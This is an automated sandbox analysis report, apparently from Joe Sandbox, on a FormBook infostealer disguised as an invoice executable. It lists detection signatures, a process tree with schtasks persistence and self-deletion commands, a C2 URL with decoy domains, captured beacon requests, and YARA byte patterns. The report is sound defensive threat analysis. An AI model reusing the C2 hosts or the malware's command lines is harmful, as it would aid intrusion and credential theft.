Loading ...

Play interactive tourEdit tour

Analysis Report invoice#56432_Pdf.exe

Overview

General Information

Sample Name:invoice#56432_Pdf.exe
Analysis ID:433430
MD5:1872fbdcb3e1ecd6d2c7c4c0e3f0542c
SHA1:d3ac7e7add55ae2d25aa6ad3a015e22cd7a3447d
SHA256:70a1c87cde771cea10a195826a8ddd79003cac8ba3ec50e10cc2be34499fd846
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • invoice#56432_Pdf.exe (PID: 240 cmdline: 'C:\Users\user\Desktop\invoice#56432_Pdf.exe' MD5: 1872FBDCB3E1ECD6D2C7C4C0E3F0542C)
    • schtasks.exe (PID: 5872 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UzYBKefg' /XML 'C:\Users\user\AppData\Local\Temp\tmpC457.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 4240 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • schtasks.exe (PID: 5148 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\suSwVklf' /XML 'C:\Users\user\AppData\Local\Temp\tmpCDAE.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • RegSvcs.exe (PID: 4488 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • RegSvcs.exe (PID: 4204 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
        • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 4856 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
            • cmd.exe (PID: 1492 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.martinbrosenterprise.com/nyd/"], "decoy": ["acpqpmq.icu", "byonf.com", "physicianco.com", "wecare4therich.com", "kenziesboutique.com", "coachingfortransformation.co.uk", "redenginegames.info", "allindefi.xyz", "hashflo.com", "carnivalhotels.net", "yogatrac.com", "hotel-gasthof-neukirchen.com", "ebn-lapak.com", "xn--3iqa8101avze.com", "sanimist.store", "studentsafetysheild.store", "themontalbanogroup.com", "oyunhaberler.com", "sportsbooksnv.com", "yogiinthedistrict.com", "corrlib.com", "awpnoqe.icu", "navagecleaningservices.com", "fitangxinyu.com", "vortexhairspray.com", "aminulhaque.info", "tonjilgroup.com", "lifehack.academy", "100001ip.com", "dotacionesmedicasmarmol.com", "poyoiz.com", "alphamillls.com", "disbalef.com", "getuewqarefedre.com", "rekoup.tax", "andalusiaexclusive.com", "eternal-affairs.com", "shessosophisticated.com", "virtualappraisals.online", "hezhongvn.com", "catalogcardgames.com", "8160phaeton.com", "wsacs.xyz", "wibstow.icu", "potoloks-spb.online", "fernholt.com", "relocatetoswitzerland.com", "evservice.network", "atome.science", "shockleymediacenter.com", "omae-mada.xyz", "standingstonecellars.com", "ynabvn.com", "homeofmatriarch.com", "legalteamsolutions.com", "sheensheer.com", "yossiamoday.com", "angelinacamwhalen.site", "garagedoorrepairparts.com", "signworksvalpo.com", "dalalh.info", "jubawu.com", "lifen.club", "wfl.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 23 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.0.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.0.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.0.RegSvcs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        7.0.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.0.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicious Process Start Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\invoice#56432_Pdf.exe' , ParentImage: C:\Users\user\Desktop\invoice#56432_Pdf.exe, ParentProcessId: 240, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4240
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\invoice#56432_Pdf.exe' , ParentImage: C:\Users\user\Desktop\invoice#56432_Pdf.exe, ParentProcessId: 240, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4240

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.martinbrosenterprise.com/nyd/"], "decoy": ["acpqpmq.icu", "byonf.com", "physicianco.com", "wecare4therich.com", "kenziesboutique.com", "coachingfortransformation.co.uk", "redenginegames.info", "allindefi.xyz", "hashflo.com", "carnivalhotels.net", "yogatrac.com", "hotel-gasthof-neukirchen.com", "ebn-lapak.com", "xn--3iqa8101avze.com", "sanimist.store", "studentsafetysheild.store", "themontalbanogroup.com", "oyunhaberler.com", "sportsbooksnv.com", "yogiinthedistrict.com", "corrlib.com", "awpnoqe.icu", "navagecleaningservices.com", "fitangxinyu.com", "vortexhairspray.com", "aminulhaque.info", "tonjilgroup.com", "lifehack.academy", "100001ip.com", "dotacionesmedicasmarmol.com", "poyoiz.com", "alphamillls.com", "disbalef.com", "getuewqarefedre.com", "rekoup.tax", "andalusiaexclusive.com", "eternal-affairs.com", "shessosophisticated.com", "virtualappraisals.online", "hezhongvn.com", "catalogcardgames.com", "8160phaeton.com", "wsacs.xyz", "wibstow.icu", "potoloks-spb.online", "fernholt.com", "relocatetoswitzerland.com", "evservice.network", "atome.science", "shockleymediacenter.com", "omae-mada.xyz", "standingstonecellars.com", "ynabvn.com", "homeofmatriarch.com", "legalteamsolutions.com", "sheensheer.com", "yossiamoday.com", "angelinacamwhalen.site", "garagedoorrepairparts.com", "signworksvalpo.com", "dalalh.info", "jubawu.com", "lifen.club", "wfl.xyz"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\UzYBKefg.exeMetadefender: Detection: 22%Perma Link
          Source: C:\Users\user\AppData\Roaming\UzYBKefg.exeReversingLabs: Detection: 62%
          Multi AV Scanner detection for submitted fileShow sources
          Source: invoice#56432_Pdf.exeVirustotal: Detection: 35%Perma Link
          Source: invoice#56432_Pdf.exeMetadefender: Detection: 22%Perma Link
          Source: invoice#56432_Pdf.exeReversingLabs: Detection: 62%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.906109110.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.722070122.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.663797541.0000000003D0F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.722159635.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.660997479.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.905935613.0000000000550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 7.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: invoice#56432_Pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: invoice#56432_Pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.679116280.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\JdlLNSkSGv\src\obj\Debug\IsolatedStorageContainment.pdb source: invoice#56432_Pdf.exe
          Source: Binary string: RegSvcs.pdb, source: help.exe, 00000009.00000002.906326047.0000000002D2D000.00000004.00000020.sdmp, suSwVklf.exe.3.dr
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.722402636.0000000001AEF000.00000040.00000001.sdmp, help.exe, 00000009.00000002.906489870.00000000030DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, help.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\JdlLNSkSGv\src\obj\Debug\IsolatedStorageContainment.pdbP source: invoice#56432_Pdf.exe
          Source: Binary string: RegSvcs.pdb source: help.exe, 00000009.00000002.906326047.0000000002D2D000.00000004.00000020.sdmp, suSwVklf.exe.3.dr
          Source: Binary string: help.pdbGCTL source: RegSvcs.exe, 00000007.00000002.722249778.0000000001980000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: RegSvcs.exe, 00000007.00000002.722249778.0000000001980000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.679116280.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h3_2_02B3AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h3_2_02B3AAA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h3_2_02B39A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h3_2_02B39A40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h3_2_02B3AB61
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi7_2_00416C7E
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi9_2_00566C7E

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.martinbrosenterprise.com/nyd/
          Source: global trafficHTTP traffic detected: GET /nyd/?T0=v4hXcVvxmJdL&6l=dkq0cGC/LEW83SVi83HPhPtn9q1O8+UCFQ9WCoc0R0ms29HHTKVnwSEdqKQ2f/ZR/emS HTTP/1.1Host: www.martinbrosenterprise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nyd/?6l=j68GMIDNlTjtfEjWHH9a9sxWH2Ka7bvr15iXo/6Hu+1FeN5QCEAjF6MjOch6oz89j9s8&T0=v4hXcVvxmJdL HTTP/1.1Host: www.potoloks-spb.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 166.62.10.181 166.62.10.181
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
          Source: global trafficHTTP traffic detected: GET /nyd/?T0=v4hXcVvxmJdL&6l=dkq0cGC/LEW83SVi83HPhPtn9q1O8+UCFQ9WCoc0R0ms29HHTKVnwSEdqKQ2f/ZR/emS HTTP/1.1Host: www.martinbrosenterprise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nyd/?6l=j68GMIDNlTjtfEjWHH9a9sxWH2Ka7bvr15iXo/6Hu+1FeN5QCEAjF6MjOch6oz89j9s8&T0=v4hXcVvxmJdL HTTP/1.1Host: www.potoloks-spb.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.martinbrosenterprise.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Jun 2021 17:59:38 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: invoice#56432_Pdf.exe, 00000000.00000002.650308648.0000000002721000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.663368608.0000000002C16000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.663288269.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: RegSvcs.exe, 00000003.00000002.663368608.0000000002C16000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: explorer.exe, 00000008.00000000.667430352.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
